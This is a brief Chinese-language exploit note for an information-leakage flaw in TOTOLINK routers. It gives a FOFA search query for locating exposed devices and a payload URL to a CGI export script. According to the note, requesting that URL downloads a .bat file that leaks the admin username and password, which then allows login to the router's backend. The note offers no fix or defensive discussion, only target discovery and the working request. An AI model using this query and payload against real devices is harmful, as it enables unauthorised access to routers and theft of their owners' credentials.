T23-1TOTOLINK–InformationLeakage

fofa语法：

fofa:“TOTOLINK”

漏洞复现：

访问会下载一个xxxx.bat文件里面泄漏账号密码，可登录后台
payload：

http://ip/cgi-bin/ExportSettings.sh